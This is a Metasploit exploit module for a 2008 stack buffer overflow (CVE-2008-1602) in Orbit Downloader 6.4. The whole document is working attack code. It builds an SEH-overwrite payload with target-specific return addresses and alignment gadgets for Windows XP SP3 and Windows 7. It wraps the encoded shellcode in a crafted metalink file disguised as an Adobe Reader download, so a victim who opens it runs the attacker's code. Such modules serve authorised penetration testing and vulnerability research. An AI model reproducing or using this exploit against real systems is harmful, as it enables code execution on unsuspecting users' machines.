Orbit Downloader URL Unicode Conversion Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Orbit Downloader URL Unicode Conversion Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in Orbit Downloader.
        The vulnerability is due to Orbit converting a URL ascii string to unicode
        in an insecure way with MultiByteToWideChar.
        The vulnerability is exploited with a specially crafted metalink file that
        should be opened with Orbit through the "File->Add Metalink..." option.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Diego Juarez', # Vulnerability discovery
          'juan vazquez', # Metasploit module
        ],
      'References'     =>
        [
          [ 'BID', '28541' ],
          [ 'OSVDB', '44036' ],
          [ 'CVE', '2008-1602' ],
          [ 'URL', 'http://www.coresecurity.com/content/orbit-downloader' ],
        ],
      'Payload'        =>
        {
          'Space'       => 2000,
          'EncoderType'	=> Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions' => { 'BufferRegister' => 'EAX' },
          'BadChars'    => "\x00\x09\x0a\x0b\x0c\x0d\x26\x3c",
          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Orbit Downloader 6.4 on Windows XP SP3',
            {
              'Ret' => 0x4b38, # p/p/r unicode compatible from orbitdm.exe
              'Nop' => 0x46, # 004600 => add [esi+0x0],al
              'AddEax' => "\x05\x15\x11", # add eax,0x11001500
              'Offset' => 4
            }
          ],
          [ 'Orbit Downloader 6.4 on Windows 7',
            {
              'Ret' => 0x4b38, # p/p/r unicode compatible from orbitdm.exe
              'Nop' => 0x46, # 004600 => add [esi+0x0],al
              'AddEax' => "\x05\x16\x11", # add eax,0x11001600
              'Offset' => 120
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2008-04-03',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.metalink']),
      ])
  end

  def exploit

    sploit = rand_text_alpha(4096 - "http://".length)
    sploit << "\xff" * 2 # EIP =>  Access Violation
    sploit << rand_text_alpha(120) # padding
    sploit << "\x61\x62" # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200)
    sploit << [target.ret].pack("v") # seh # ppr
    sploit << target['Nop']
    sploit << target['AddEax'] # eax align is os dependant
    sploit << target['Nop']
    sploit << "\x2d\x11\x11" # sub eax,0x11001100
    sploit << target['Nop']
    sploit << "\x50" # push eax
    sploit << target['Nop']
    sploit << "\xc3" # ret
    sploit << rand_text_alpha(target['Offset']) # align shellcode to eax pointer
    sploit << payload.encoded

    metalink = %Q|
<?xml version="1.0" encoding="utf-8"?>
<metalink version="3.0" generator="Metalink Generator v1.00.0034" xmlns="http://www.metalinker.org/">
  <publisher>
    <name>Adobe</name>
    <url>http://www.adobe.com/</url>
  </publisher>
  <description>Adobe Acrobat Reader</description>
  <files>
    <file name="AdbeRdr80_en_US.exe">
      <version>8.0</version>
      <language>en-US</language>
      <os>Windows-x86</os>
      <verification>
        <hash type="md5">0ab5ce309f313ed028824251c798b35c</hash>
      </verification>
      <resources>
        <url type="http" preference="100">http://#{sploit}.com/pub/adobe/reader/win/8.x/8.0/enu/AdbeRdr80_en_US.exe</url>
      </resources>
    </file>
  </files>
</metalink>
|

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(metalink)

  end
end